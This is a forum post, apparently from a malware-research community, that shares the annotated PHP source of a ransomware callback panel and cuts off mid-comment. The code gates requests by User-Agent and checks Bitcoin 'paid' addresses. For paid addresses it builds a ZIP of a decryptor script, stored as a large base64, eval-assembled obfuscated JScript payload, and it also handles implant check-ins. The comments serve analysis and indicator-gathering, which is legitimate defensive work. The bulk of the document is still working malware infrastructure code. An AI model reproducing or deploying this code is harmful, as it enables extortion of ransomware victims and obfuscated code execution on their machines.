 #28863  by benkow_
 Tue Jul 12, 2016 2:35 pm
web callback source (index.php)
<?php
 
    // Victim gate: only requests whose User-Agent is at least 32 characters long and
    // contains "Windows NT" get any response at all; everything else exits with an empty
    // body. Analysis note: nothing but this header is checked, so a sandbox replay of the
    // callback has to send a matching UA or the server returns nothing.
    if (strlen(trim($_SERVER["HTTP_USER_AGENT"])) < 32 || strpos($_SERVER["HTTP_USER_AGENT"], "Windows NT") === false) exit;
 
    // Bitcoin addresses that double as "paid" identifiers: a request whose `a` (or `ad`)
    // value matches one of them is treated as a paying victim further down. Worth
    // indexing as IoCs for this panel.
    $ads = array("17FMywjuJkpQCQaK3hxENT9yhH7Sew6Dwd","172wwa1JKd7mzLjrrPpfULStQe3smYsvi9","1NJtiqEVSHowStHzVWbyRN1rCTEpYn8srH","13yPoMcf4Fj9cigyN5pcvQwk6VenubXS19","14kAwnFyCeNdx5v9u7DEApBroEHPibX5Sh","1MjS9q9F7K8CTJnksajAz7uhDQtgjYWGV2","1Bgz4tHx62KXzL22ikTWvGiQdKTVJELf6z","1PhGvwDx6qvGSNWeezzmM1Zd26FdEB7iU1");     
 
    // Branch 1: `a=<address>` -- the victim asks for the decryptor.
    if (isset($_GET["a"]))
    {
        // Decryptor is handed out only for an address from the list above.
        if (in_array($_GET["a"],$ads))
        {
            // Minimal in-memory ZIP writer (PHP 4-style `var` properties), used below to wrap
            // the JScript payload as DECRYPT.zip. Members:
            //   $s / $i / $o  local-entry blobs, central-directory records, running offset
            //   j($x)         hex string -> raw bytes
            //   ud()          current local time as an MS-DOS date/time dword:
            //                 (year-1980)<<25 | month<<21 | day<<16 | hour<<11 | min<<5 | sec>>1
            //   a($d,$n)      appends entry $n with content $d: local file header (signature
            //                 504b0304, version needed 20, flags 0, method 8 = deflate, the
            //                 DOS time/date byte-swapped to little-endian via the x[6..1] index
            //                 shuffle), CRC-32, raw deflate data = gzcompress() output with its
            //                 2-byte zlib header and 4-byte Adler-32 trailer stripped, then the
            //                 matching central-directory record (signature 504b0102, external
            //                 attributes 32, offset of the local header). Backslashes in $n are
            //                 turned into '/'.
            //   f()           entries + central directory + end-of-central-directory record
            //                 (signature 504b0506, entry counts, CD size, CD offset, no comment).
            // The byte swap assumes dechex(ud()) is exactly 8 hex digits, which holds once
            // (year-1980) >= 8.
            class z{var $s=array();var $i=array();var $o=0;function j($x){$d="";for($i=0;$i<strlen($x);$i+=2)$d.=chr(hexdec($x[$i].$x[$i+1]));return $d;} function ud(){$a=array("y"=>date("Y"),"m"=>date("m"),"d"=>date("d"),"h"=>date("H"),"i"=>date("i"),"s"=>date("s"));return (($a["y"]-1980)<<25)|($a["m"]<<21)|($a["d"]<<16)|($a["h"]<<11)|($a["i"]<<5)|($a["s"]>>1);} function a($d,$n){$n=str_replace(chr(92),"/",$n);$x=dechex($this->ud());$h=$this->j($x[6].$x[7].$x[4].$x[5].$x[2].$x[3].$x[0].$x[1]);$fr=$this->j("504b0304140000000800").$h;$u=strlen($d);$g=crc32($d);$z=gzcompress($d);$z=substr(substr($z,0,strlen($z)-4),2);$p=strlen($z);$fr.=pack("V",$g).pack("V",$p).pack("V",$u).pack("v",strlen($n)).pack("v",0).$n.$z;$this->s[]=$fr;$r=$this->j("504b01020000140000000800").$h.pack("V",$g).pack("V",$p).pack("V",$u).pack("v",strlen($n)).pack("v",0).pack("v",0).pack("v",0).pack("v",0).pack("V",32).pack("V",$this->o);$this->o+=strlen($fr);$r.=$n;$this->i[]=$r;} function f(){$d=implode("",$this->s);$l=implode("",$this->i);return $d.$l.$this->j("504b050600000000").pack("v",sizeof($this->i)).pack("v",sizeof($this->i)).pack("V",strlen($l)).pack("V",strlen($d)).$this->j("0000");}}
 
            // JScript stage for the victim, stored base64-encoded. The readable part of the
            // stub is its skeleton: function v38(p89,c48,s15){w62[s15]=p89;} places several
            // hundred out-of-order string fragments into an array, then w62.join("") followed
            // by eval() runs the result. The fragments are not decoded on this page, so what
            // the reassembled script does is not established here.
            $dec = base64_decode("ZnVuY3Rpb24gdjM4KHA4OSxjNDgsczE1KSB7dzYyW3MxNV0gPSBwODk7fTsgdmFyIHc2MiA9IG5ldyBBcnJheSgpO3YzOCgnKG49PTQnLCA2NzQsIDIwMCk7djM4KCd9OyBpZicsIDQyMSwgMjIzKTt2MzgoJ0NPTVNQRScsIDcxMSwgMzY4KTt2MzgoJyUgL2MgJywgNjkxLCA0MTMpO3YzOCgnIG49MztuJywgOTU0LCAxMzIpO3YzOCgnIiwwLCcsIDQ5MCwgMzI2KTt2MzgoJyVDT00nLCA3NzAsIDQyNCk7djM4KCduZCgnLCAxMTYsIDE2NSk7djM4KCctYicsIDk0NCwgMzQpO3YzOCgneGEuc2EnLCA4NSwgMjExKTt2MzgoJ3RlTycsIDE2MSwgMTA5KTt2MzgoJ0MlICcsIDI4NCwgNDQwKTt2MzgoJytpK24nLCA3MjUsIDE2MCk7djM4KCcwKTsgJywgMjU3LCAzNDQpO3YzOCgnZ3MoIiUnLCA2ODQsIDc0KTt2MzgoJ2luJywgOSwgNzMpO3YzOCgnTVNQRUMnLCA1NzcsIDMxMik7djM4KCdyaScsIDU3MSwgNyk7djM4KCcodmFyIGknLCA4MzIsIDM5OCk7djM4KCdlY3QoIicsIDQxMCwgOTkpO3YzOCgndG5lcnMnLCAzMTcsIDI1KTt2MzgoJyJTT0ZUJywgNDcwLCAyODEpO3YzOCgnd3d3JywgNDk2LCA0MCk7djM4KCd0ZScsIDMyNSwgMTU1KTt2MzgoJ29zZScsIDM1LCA0MDcpO3YzOCgnY3QoJywgODc2LCAxMTEpO3YzOCgnbz1XU2NyJywgMTQsIDExOCk7djM4KCdNU1BFJywgODI1LCAzNDgpO3YzOCgnZW4oIkcnLCA5MTksIDE0OCk7djM4KCd3cz1XUycsIDUzOSwgNTYpO3YzOCgnT0RCJywgNTgyLCAxMTMpO3YzOCgnd3MnLCA1OTMsIDQzNik7djM4KCduLm9yJywgODU2LCAzMSk7djM4KCdGaWwnLCA0ODUsIDIwNCk7djM4KCciIC8nLCA1NDgsIDMwMCk7djM4KCciKStjcycsIDkyNywgNzYpO3YzOCgnVC50JywgNjE5LCAzODQpO3YzOCgnTVAlIikrJywgNzkwLCA4OSk7djM4KCdXcml0ZUwnLCAzNjgsIDQwMyk7djM4KCdZUFQudHgnLCAyNjMsIDM2MSk7djM4KCcgeG8uJywgOTA2LCAxNjMpO3YzOCgndFYnLCA1MzcsIDI5NCk7djM4KCdpbycsIDY0OSwgMzApO3YzOCgnZmknLCAzNzUsIDM3Nik7djM4KCcrYycsIDY2NiwgMzIzKTt2MzgoJ2NyaXAnLCA1MDIsIDYzKTt2MzgoJ3AiK2NzJywgMzM5LCAzNTkpO3YzOCgnRVQnLCA5NDcsIDMxNSk7djM4KCdSdW4nLCA4MDgsIDI1OCk7djM4KCdmb3IoJywgMzIsIDEzNik7djM4KCdvZWQnLCAyNDUsIDQ0KTt2MzgoJ2NvJywgNTgsIDM2KTt2MzgoJ25nJywgMTU3LCA4KTt2MzgoJ3RzKGZuJywgMjQzLCAyNDEpO3YzOCgnbmd0aDsnLCA3ODAsIDE0MSk7djM4KCcgaWYobicsIDIyMSwgMjA4KTt2MzgoJ3hvJywgNDg4LCAxNzkpO3YzOCgnO2knLCAyOTQsIDEzOSk7djM4KCdqZScsIDUzNSwgNjEpO3YzOCgnKyJIS0MnLCAyNzYsIDMzNik7djM4KCd3cy5SdScsIDUwOSwgMzQ1KTt2MzgoJ3dzJywgODE1LCAzNjUpO3YzOCgnbGwiOyB2JywgMjcxLCA5Mik7djM4KCdsb2cuJywgODMzLCAzNSk7djM4KCdERUwgIisnLCAyNDksIDQxNCk7djM4KCdxLDAsMCknLC
A5NTIsIDQ0NCk7djM4KCcrIkNyeXAnLCA1MzAsIDMzOSk7djM4KCdyLycsIDY4NiwgMTU2KTt2MzgoJ25zZUJvJywgNTA4LCAxODEpO3YzOCgncStmbisnLCAyMzgsIDI2NSk7djM4KCdpKycsIDc4MiwgMTQyKTt2MzgoJzwxMCcsIDUzNCwgNDAwKTt2MzgoJ2l0JywgOTc3LCA1Mik7djM4KCdNTEhUVCcsIDMwOSwgMTAyKTt2MzgoJyhkbicsIDM2MSwgMjI0KTt2MzgoJ2NxPVN0JywgOTk5LCA2KTt2MzgoJ2VuKCk7JywgNzMzLCAxNzMpO3YzOCgnIitjcycsIDU0MCwgMzU2KTt2MzgoJzxsbC5sZScsIDQ1MSwgMTQwKTt2MzgoJ3Zpcm9uJywgMzEsIDcwKTt2MzgoJ28uJywgMzIzLCAxNjgpO3YzOCgnb24nLCA1ODAsIDMzKTt2MzgoJy9jIEQnLCA5MzgsIDQ0MSk7djM4KCd0eXBlPScsIDcwMSwgMTc1KTt2MzgoJ2FsbCcsIDY1LCAyMyk7djM4KCcuZXhlIicsIDIwMiwgNDMxKTt2MzgoJyB3cy5SdScsIDM4OCwgMjY5KTt2MzgoJ3RlZCInLCAzMTEsIDMwMyk7djM4KCcmcm5kPSInLCA3MTYsIDE1OSk7djM4KCd2YXIgJywgNjA1LCAwKTt2MzgoJysiREVDUicsIDcyMCwgMzgyKTt2MzgoJ2xlJywgNDc4LCAxMjYpO3YzOCgnQ08nLCAyNjEsIDMxMSk7djM4KCcwLDApJywgMzExLCA0MzQpO3YzOCgnIHZhcicsIDI5OCwgMTQ0KTt2MzgoJyB4by5vcCcsIDk0NSwgMTQ3KTt2MzgoJzkyKScsIDgyMCwgMTgpO3YzOCgnY3M9U3QnLCAxMTUsIDEzKTt2MzgoJ1hNTDIuWCcsIDc4NiwgMTAxKTt2MzgoJ2NxJywgNzUsIDM1Mik7djM4KCdyZScsIDEzOCwgOTcpO3YzOCgnQCI7JywgODc4LCAyKTt2MzgoJ2FrJywgODg2LCAyMzApO3YzOCgnKTsgaScsIDY5MywgMTY2KTt2MzgoJ2hwJywgNTgsIDQxNyk7djM4KCdhZD0iJywgODE4LCAxKTt2MzgoJ3A0dHMuZCcsIDE5MSwgOTEpO3YzOCgnZyBqYXAnLCA3MDcsIDMyKTt2MzgoJyIrY3ErIicsIDUzMiwgMzQxKTt2MzgoJzsgJywgNDQ2LCAyMjIpO3YzOCgnYSUnLCA5MzAsIDM1NSk7djM4KCd3cml0ZSgnLCA3MTgsIDE3OCk7djM4KCdSdScsIDkwMywgMzA5KTt2MzgoJ2goZXIpJywgNDU0LCAyMzQpO3YzOCgnU2hlbGwiJywgNTQ0LCA2NSk7djM4KCc7IH07IH0nLCAyNjEsIDIzNik7djM4KCc9MDtpJywgNzg1LCAzOTkpO3YzOCgnd3MuRXgnLCAyMDcsIDgxKTt2MzgoJzsgaScsIDY4MSwgMjM3KTt2MzgoJ29zJywgNDQ1LCAyODUpO3YzOCgnamtlbi5uJywgNjY4LCA0OSk7djM4KCdNUycsIDU5MywgMTAwKTt2MzgoJ2Vyc2lvJywgODU1LCAyOTUpO3YzOCgnIC9GJywgMzM4LCAzNDIpO3YzOCgnd3MuRXgnLCA5NSwgNjgpO3YzOCgnIiVDTycsIDE1MSwgMzI5KTt2MzgoJ2ldKyIvYycsIDQyMiwgMTUzKTt2MzgoJ1YgIitjcScsIDkyOSwgMzAxKTt2MzgoJ2ZuKyIucCcsIDYyNSwgNDE2KTt2MzgoJ3AuQ2wnLCAxOTgsIDQwNik7djM4KCcvRicsIDI1NSwgMzI1KTt2MzgoJ2VzaycsIDE2NSwgMzc5KTt2MzgoJ2NyeScsIDgxOCwgMzIxKTt2MzgoJ3BocCInLCAxMjksIDIxNik7djM4KCdsZCcsIDc3MSwgMT
M4KTt2MzgoJ3RlT2InLCA5MDcsIDYwKTt2MzgoJ3RyJywgMTM1LCAzOTUpO3YzOCgnbiIrYycsIDM5NiwgMjk2KTt2MzgoJ249MTsgJywgMzM3LCAxODgpO3YzOCgnbnZpcicsIDE3NiwgODQpO3YzOCgncSsnLCA3MiwgMjk5KTt2MzgoJzsgdicsIDI1MSwgMTkpO3YzOCgnIi5waHAnLCA4MzEsIDM5Myk7djM4KCdmbisiJywgNDQ3LCA0MzApO3YzOCgncGFuZEVuJywgMTksIDY5KTt2MzgoJ0ZpbCcsIDMyNCwgMjM5KTt2MzgoJygiICIpJywgNDM2LCA1Myk7djM4KCdkb3dzIicsIDc5NSwgMjkwKTt2MzgoJytsbFsnLCA0MiwgMTUyKTt2MzgoJ3BsJywgNDI5LCA1MSk7djM4KCdxLDAsJywgNjU5LCAzNjMpO3YzOCgnYXIgZm49JywgNTUsIDY3KTt2MzgoJ2MgRCcsIDIyNiwgNDI3KTt2MzgoJyIucGhwJywgNzU3LCAyNjYpO3YzOCgnICYmICcsIDg0OSwgMjQ5KTt2MzgoJ2F0ZU9iaicsIDY1NSwgOTgpO3YzOCgnKXsnLCA0MzUsIDIyNik7djM4KCd4ZSAiK2MnLCA3ODksIDI2NCk7djM4KCdudFN0JywgNzE1LCA4Nik7djM4KCdkZScsIDE0MCwgMzcxKTt2MzgoJ0MlIC8nLCAxNjEsIDQyNik7djM4KCcrImEnLCAzMDgsIDc3KTt2MzgoJ2NzKyJwaCcsIDkzMiwgOTApO3YzOCgnc2l6ZT4xJywgOTM3LCAxODUpO3YzOCgnRmlsJywgNTQ3LCAxOTMpO3YzOCgnLDApOycsIDc3NSwgNDE5KTt2MzgoJ1BFQyUgLycsIDU5NSwgMzMxKTt2MzgoJ3BwRGF0JywgNzI2LCAzNTQpO3YzOCgnY3JpcCcsIDQwMCwgNTcpO3YzOCgneGE9JywgNDk2LCAxMDUpO3YzOCgnLkZpJywgMjI0LCAxMjUpO3YzOCgnaWYoeGEuJywgNTY4LCAxODQpO3YzOCgnJUNPTVMnLCAxNjAsIDQzOCk7djM4KCdhLnNhdmUnLCA0NDAsIDIwMik7djM4KCcsMCknLCA3MTksIDMwNyk7djM4KCdtT2JqJywgMzg3LCAxMjgpO3YzOCgnKGZuKyIuJywgMTQ4LCAyMTUpO3YzOCgnLDIpOycsIDY1MywgMjE3KTt2MzgoJ3JlYXRlTycsIDg3MSwgMTIwKTt2MzgoJ2JyZScsIDUzMiwgMjI5KTt2MzgoJ2UiKSAnLCA3LCAyNDMpO3YzOCgnU1BFJywgODk1LCA0MjUpO3YzOCgnKyJXaW4nLCA1MDcsIDI4OSk7djM4KCdpcHQuQycsIDUzOCwgMTE5KTt2MzgoJ3JpbmcuJywgOTgzLCAxNCk7djM4KCd2YXIgaT0nLCAyNzIsIDEzNyk7djM4KCdhcicsIDQ1NiwgMTYpO3YzOCgncmVhdGUnLCA2MzksIDM5MCk7djM4KCd1ZSk7ZicsIDU2MCwgMzk2KTt2MzgoJyk7fSBlJywgMTgzLCAxOTcpO3YzOCgnOyB2JywgODU5LCA1NCk7djM4KCdzdGF0dXMnLCA1NTAsIDE2OSk7djM4KCdFICcsIDExOSwgMjc3KTt2MzgoJ291bicsIDQ4MiwgMTU0KTt2MzgoJ21vdCcsIDE5OSwgMjkpO3YzOCgncSwnLCA2NzYsIDQzMyk7djM4KCdzLlJ1bignLCA3MTcsIDMyOCk7djM4KCc7IHZhciAnLCA4NDgsIDEyKTt2MzgoJ2NyaXB0JywgNDIxLCAxMjMpO3YzOCgnbCIucycsIDkyNiwgNTApO3YzOCgnQ08nLCA0OTcsIDM0Nyk7djM4KCciK2NxKyInLCA1ODEsIDI3OCk7djM4KCclVXNlJywgMzY3LCAzNzQpO3YzOCgnMyknLC
A3MTYsIDE5MCk7djM4KCd4dCIrY3EnLCA2NiwgMzg1KTt2MzgoJ3ByJywgMzIxLCA0NSk7djM4KCdFQycsIDUxMywgNDEyKTt2MzgoJ2FkKyInLCAxMjYsIDE1OCk7djM4KCciK2NzKycsIDY5OSwgMjgwKTt2MzgoJ2wgIisnLCA3NjEsIDM1MSk7djM4KCdjcysiRCcsIDgzOCwgMzc4KTt2MzgoJ3JpbmdzKCcsIDc0LCA4Nyk7djM4KCdQIiknLCAyNjcsIDEwMyk7djM4KCcrYycsIDgxMSwgMzA0KTt2MzgoJ0N1cicsIDkxOCwgMjkyKTt2MzgoJ1dTY3JpJywgNDE4LCAxMDYpO3YzOCgnY3ErJywgMzA5LCA0MTUpO3YzOCgnfTsgeGEnLCAzNjQsIDIxOSk7djM4KCdzKyJSdScsIDQ4NCwgMjk3KTt2MzgoJyB2YXIgbCcsIDk1MiwgMyk7djM4KCcgdmFyJywgNTI2LCAxMTYpO3YzOCgncmVhJywgMTA0LCAxMDgpO3YzOCgnIi5waHAiJywgMzM4LCAyNTQpO3YzOCgnRmlsZScsIDgzLCAyMTQpO3YzOCgnb25tZScsIDIwNywgODUpO3YzOCgnYXIgbGw9JywgMTQ1LCAyMCk7djM4KCd9OyAnLCA3NTcsIDIxOCk7djM4KCduKCIlJywgNTM4LCAzNjcpO3YzOCgnRUxFVCcsIDc4MSwgMzM0KTt2MzgoJyl7eCcsIDY1NCwgMjAxKTt2MzgoJ0MlIC9jICcsIDg3NywgMzQ5KTt2MzgoJ2t0bycsIDc4MSwgMzU4KTt2MzgoJyAvYycsIDI0MCwgMjczKTt2MzgoJ3t9JywgMTU0LCAyMzUpO3YzOCgneGlzJywgMTA4LCAyNDcpO3YzOCgnIHRyeSB7JywgODY1LCAxNDYpO3YzOCgnY3QoIldTJywgMzg2LCA2Mik7djM4KCc9PTEnLCA1MjgsIDIyNSk7djM4KCdkPTA7ICcsIDE1LCA0KTt2MzgoJ2VjdCIpJywgODUxLCAxMjkpO3YzOCgnRVQiLCInLCA3NDUsIDE0OSk7djM4KCdXU2NyaScsIDg4MSwgOTUpO3YzOCgnOyB3cy4nLCA1MTcsIDMwOCk7djM4KCdFQyUnLCA4MjEsIDI3Mik7djM4KCdpbmcnLCA0MzUsIDEyNCk7djM4KCcrKykgJywgMTMwLCAxMzQpO3YzOCgnZGUnLCAyODksIDM1MCk7djM4KCdlKHBkJywgODQ3LCAyMDUpO3YzOCgnIlMnLCAxNTAsIDEyMik7djM4KCcvYyAiKycsIDU3LCAyNjEpO3YzOCgndFN0cicsIDg5MywgNzIpO3YzOCgnKykgeycsIDIyNSwgMTQzKTt2MzgoJy5jJywgNTI2LCAyNik7djM4KCdXQVJFIisnLCA1OTksIDI4Mik7djM4KCdzKGZuKycsIDI4NiwgMjUzKTt2MzgoJygiJywgODkzLCA0MjMpO3YzOCgnY3MnLCA4NTEsIDI4Myk7djM4KCdhbmQnLCAzMzAsIDIyKTt2MzgoJywyJywgNDcsIDE5Nik7djM4KCciY3InLCA1NzksIDIxKTt2MzgoJ0VHIERFTCcsIDczMiwgMzE0KTt2MzgoJ1J1bicsIDg3NiwgNDIyKTt2MzgoJy5jeiAnLCAyODYsIDM5KTt2MzgoJ2NzJywgNjg5LCAzMzgpO3YzOCgncHQuQycsIDI1OSwgOTYpO3YzOCgnbGVFJywgMjk3LCAyNDYpO3YzOCgnLCBmJywgNzI1LCAxNjEpO3YzOCgnbGUlIisnLCA0NzksIDM3Nyk7djM4KCciJVRFJywgNTAyLCA4OCk7djM4KCdmKHgnLCA1MjMsIDE2Nyk7djM4KCdFRyAnLCA3ODcsIDI3NSk7djM4KCcgL2MgJywgMjY1LCAzNzApO3YzOCgnZCk7fTtmJywgMzM0LCA0MDUpO3
YzOCgnZEUnLCA4NjgsIDgzKTt2MzgoJ3NlKCknLCAzNTYsIDIyMSk7djM4KCcwKSB7IGQnLCA2NjgsIDE4Nyk7djM4KCdmcm9tQ2gnLCA0NDAsIDE1KTt2MzgoJzsgdmFyICcsIDc0OCwgMTA0KTt2MzgoJ2h0dCcsIDI4MSwgMTUwKTt2MzgoJ3dzLicsIDU0LCAyNTcpO3YzOCgnKCIlJywgMzM3LCA0MTApO3YzOCgnLlJ1bicsIDQ3MSwgNDA5KTt2MzgoJ3QiK2MnLCA2MjYsIDM2Mik7djM4KCcuUnVuKCInLCA0NTYsIDQzNyk7djM4KCdUZXh0RmknLCAzMSwgMzkxKTt2MzgoJyIrJywgNzU1LCAyODcpO3YzOCgnUkVHIEQnLCAzMjYsIDMzMyk7djM4KCcoIiVDT00nLCA0NTgsIDI1OSk7djM4KCdzZScsIDQzNiwgMTY0KTt2MzgoJyB3JywgMjAsIDQyMCk7djM4KCduKCIlJywgMTYwLCAyNzApO3YzOCgnaTsnLCA4NDcsIDIyOCk7djM4KCdiamVjdCgnLCA2NzYsIDEyMSk7djM4KCcpOyB2JywgNzQ4LCA2Nik7djM4KCdhLWRlbicsIDEzNywgMzgpO3YzOCgnaWYobj09JywgOTE4LCAxODkpO3YzOCgnKyIlQScsIDExMiwgMzUzKTt2MzgoJzApOyB3JywgMjIxLCAzMjcpO3YzOCgnMDA7aSsrJywgMTM4LCA0MDEpO3YzOCgncHRlZCInLCA0NjgsIDMyMik7djM4KCcuY2xvJywgMjI3LCAyMjApO3YzOCgnLlJ1JywgMTY2LCAzNjYpO3YzOCgndHMocGQpJywgMzkzLCAyNDgpO3YzOCgnOyB2JywgMzcyLCAzODcpO3YzOCgnVEVNUCUnLCAyMzMsIDc1KTt2MzgoJ2wgIicsIDMyNCwgMzcyKTt2MzgoJ2VlJywgMTM2LCA0Mik7djM4KCciK2NxLDAnLCA3MDQsIDQxOCk7djM4KCdmby5DJywgOTI2LCAzODkpO3YzOCgnLDAsMCknLCA5MiwgMzg2KTt2MzgoJ0UgJywgNDI5LCAzMTYpO3YzOCgnKSknLCA1LCAyNTUpO3YzOCgnSEtDJywgNDE5LCAzMTgpO3YzOCgnPT01JywgMjE3LCAyMDkpO3YzOCgneyAnLCA3MDcsIDEzNSk7djM4KCdmKGZvLicsIDY4NCwgMjM4KTt2MzgoJ3B0LkMnLCAzOSwgMTA3KTt2MzgoJ3A6Ly8iJywgNzM4LCAxNTEpO3YzOCgnbigiJScsIDYxMCwgMzEwKTt2MzgoJy5GaWwnLCA0NjksIDI1MSk7djM4KCcrIkRFQ1InLCAyNTksIDM2MCk7djM4KCdsZD0nLCA1NDksIDIyNyk7djM4KCcpeycsIDIyNSwgMjEwKTt2MzgoJ2ZvJywgMTQ0LCAyNTApO3YzOCgnVG8nLCAyMjcsIDIwMyk7djM4KCdlbGknLCA5NTcsIDQ4KTt2MzgoJzsgfTsnLCA5MzYsIDQ0NSk7djM4KCdyZW4nLCA4NDAsIDI5Myk7djM4KCdSIisnLCA0MDksIDMzNyk7djM4KCdQRScsIDY0OCwgNDM5KTt2MzgoJ3JQcm8nLCAzMywgMzc1KTt2MzgoJ3hhLm9wJywgNzE4LCAxNzIpO3YzOCgnaWp6JywgODA1LCA0Nik7djM4KCdvcih2YXInLCA3NTcsIDEzMSk7djM4KCdwYXInLCA1MDUsIDI0KTt2MzgoJ20gbicsIDI2MiwgMzcpO3YzOCgnIHsgJywgMzc2LCAyNTYpO3YzOCgnKyJEZXMnLCA0ODcsIDM1Nyk7djM4KCciK2NxJywgMzc0LCAyNjcpO3YzOCgnY3MnLCA2NzgsIDI4OCk7djM4KCciLDAnLCA4NDAsIDMwNik7djM4KCcwKTsgJywgMzM4LCAzNjQpO3YzOCgnWVAnLC
AyNTcsIDM4Myk7djM4KCdvcicsIDc4OSwgMzk3KTt2MzgoJyJBRCcsIDExLCAxMTIpO3YzOCgnTVMnLCA5NDIsIDMzMCk7djM4KCdDT01TUCcsIDY2NiwgMjcxKTt2MzgoJ2F2ZVRvJywgNjYwLCAxOTIpO3YzOCgnIitjcSsiJywgNDAyLCAzMTcpO3YzOCgnRUwgIitjJywgNTY1LCA0NDIpO3YzOCgnZW52ZXJnJywgOTc4LCA0Nyk7djM4KCciLCcsIDczNywgMzk0KTt2MzgoJ29tIHNwJywgNDIsIDI3KTt2MzgoJ2FyIGZwPScsIDgzLCAzODgpO3YzOCgnQ3JlYScsIDM5NywgNTkpO3YzOCgncStwZCtjJywgNzcyLCA0NDMpO3YzOCgnUiIrY3MrJywgMzQzLCAzMTkpO3YzOCgnIiwwLCcsIDYzMSwgMzQzKTt2MzgoJ3ZhciAnLCAxNTQsIDUpO3YzOCgnKyIuZScsIDE0MiwgMjYzKTt2MzgoJ2R5JywgMzQ3LCAxODIpO3YzOCgnMTsnLCA2NzMsIDE3Nik7djM4KCcrY3ErIicsIDg2MCwgMzczKTt2MzgoJ0NoYXJDbycsIDU1NiwgMTApO3YzOCgnO307JywgODM4LCAyMzEpO3YzOCgnKyJDcnlwJywgMTI0LCAzMDIpO3YzOCgnIGYnLCAxNjMsIDExNyk7djM4KCdsZShmbisnLCA1ODksIDM5Mik7djM4KCdTeXN0ZScsIDI2LCAxMjcpO3YzOCgnLnNwJywgODg0LCA0MSk7djM4KCc9PTInLCA3MjQsIDE3MCk7djM4KCdmby5GaScsIDU0MCwgMjQ1KTt2MzgoJzsgZicsIDEsIDEzMCk7djM4KCdhbHNlKTsnLCA2NDYsIDE2Mik7djM4KCcwMCkgeyAnLCA3NiwgMTcxKTt2MzgoJytjcysiJywgNjYzLCAyOTEpO3YzOCgnQ29kZSgnLCA5MzYsIDE3KTt2MzgoJ2UoZm4rIicsIDcwMCwgMTk0KTt2MzgoJ2luZShhJywgMTIsIDQwNCk7djM4KCdsZycsIDU0NywgNDMpO3YzOCgnbWVuJywgNTQzLCA3MSk7djM4KCcrIi5leCcsIDE3NSwgMjQyKTt2MzgoJ2VFeGlzJywgODIwLCAyNDApO3YzOCgnKCk7IHdzJywgMTk3LCA0MDgpO3YzOCgnY2F0YycsIDgyMSwgMjMzKTt2MzgoJ3IgJywgNTIsIDc5KTt2MzgoJ0RFTEVUJywgMjU4LCAyNzYpO3YzOCgndC4nLCA5NjMsIDY0KTt2MzgoJyB4YS4nLCA3MDQsIDE3Nyk7djM4KCcsMik7fSAnLCA3OTUsIDIwNik7djM4KCdiamUnLCA1NTYsIDExMCk7djM4KCcwMCcsIDY2MSwgMTg2KTt2MzgoJ0UgIitjcScsIDM0MiwgMzM1KTt2MzgoJyYmICcsIDM5NCwgMjQ0KTt2MzgoJ3MuJywgODcwLCA0MjEpO3YzOCgnb2Z0JywgNjgsIDI4Nik7djM4KCdFTCAiK2MnLCAxODAsIDQyOCk7djM4KCcpe2ZwLicsIDg5MSwgNDAyKTt2MzgoJy5yZXNwbycsIDc5NCwgMTgwKTt2MzgoJytjJywgNTI3LCA0MzIpO3YzOCgncSsiIC9GJywgNjQ2LCAzMDUpO3YzOCgnLmZyb20nLCA2NjUsIDkpO3YzOCgncGFuJywgNTM1LCA4Mik7djM4KCcgfSAnLCA5MjEsIDIzMik7djM4KCc/YWQ9IisnLCA0MzksIDE1Nyk7djM4KCdjcycsIDMzNSwgMzgxKTt2MzgoJyBkbj0wOycsIDk1NiwgMTQ1KTt2MzgoJ3RvcCIrJywgMTcsIDM4MCk7djM4KCc8PTU7bicsIDg0MSwgMTMzKTt2MzgoJyIuJywgOTgsIDMyMCk7djM4KCc7ICcsIDMxLCA0MzUpO3YzOCgnbi
giJScsIDQ2OSwgMzQ2KTt2MzgoJ2RlKDM0KScsIDYxMywgMTEpO3YzOCgnIHhhLicsIDMyNCwgMTc0KTt2MzgoJ2ZuJywgOTY3LCAyNjIpO3YzOCgncSsnLCAyMDksIDQyOSk7djM4KCclIC9jIFInLCA1MDcsIDMxMyk7djM4KCciOyB2YScsIDc1NSwgNzgpO3YzOCgnQyUnLCA2OTksIDM2OSk7djM4KCdDT01TUCcsIDI5MCwgNDExKTt2MzgoJysiTWljcicsIDYzMiwgMjg0KTt2MzgoJ0hLQ1UnLCA0NTgsIDI3OSk7djM4KCdxKyIgJywgMjY3LCAzMjQpO3YzOCgnYXIgJywgOTgsIDU1KTt2MzgoJ3QuJywgMTMxLCA1OCk7djM4KCd2ZScsIDc2OCwgMjEyKTt2MzgoJ20iKTsnLCA3MjksIDExNSk7djM4KCd0ZWQnLCA2NjMsIDM0MCk7djM4KCd7eGEucycsIDM4NywgMTkxKTt2MzgoJyk7ICcsIDM3NiwgMTgzKTt2MzgoJ2Vsc2UnLCAyMjgsIDIwNyk7djM4KCdwZD0nLCA4NDksIDgwKTt2MzgoJyBSJywgMTk2LCAyNzQpO3YzOCgnLlN0cmVhJywgMjA1LCAxMTQpO3YzOCgneG89JywgMjQ1LCA5NCk7djM4KCdpZicsIDkwMSwgMTk5KTt2MzgoJywxLDEpOycsIDU1MywgMjY4KTt2MzgoJ2VFeGlzdCcsIDczOSwgMjUyKTt2MzgoJy5leGUiJywgNTA2LCAxOTUpO3YzOCgnVG8nLCAzLCAyMTMpO3YzOCgnYyAnLCA1OTEsIDMzMik7djM4KCdhY2UnLCA2NDIsIDI4KTt2MzgoJ2FyICcsIDgyNiwgOTMpO3YzOCgnU1BFQyUgJywgMjYsIDI2MCk7djM4KCduIitjJywgMjUxLCAyOTgpO3YzOCgnbHNlICcsIDE1NSwgMTk4KTt3NjIgPSB3NjIuam9pbigiIik7IGV2YWwodzYyKTs=");
            // The '@' placeholder inside the script is replaced with the address the victim
            // supplied, so each generated DECRYPT.js is tied to that value.
            $dec = str_replace("@", $_GET["a"], $dec);
 
            // Wrap the script as DECRYPT.zip (single entry DECRYPT.js) with the in-memory
            // ZIP writer defined above and stream it as a binary attachment.
            $zip=new z();
            $zip->a($dec, "DECRYPT.js");
            $cn = $zip->f();
           
            header("Content-Transfer-Encoding: binary");
            header("Content-Length: ".strlen($cn));
            header("Content-Disposition: attachment; filename=DECRYPT.zip");
            header("Content-Type: application/octet-stream");
 
            print $cn;
            exit;
        }
        else
        {
            // Address not on the list: plain-text refusal.
            header ("Content-type: text/plain");
 
            print "Access denied. Waiting for a payment...";
        }
    }
    // Branch 2: implant check-in, reached with `id` and/or `ad`. `ad` is the value the
    // locker key is derived from (below); `id` is presumably a per-victim marker and is
    // only ever tested for presence.
    elseif (isset($_GET["id"]) || isset($_GET["ad"]))
    {
        // Last character of `rnd`, coerced to a number (0 when absent), selects which
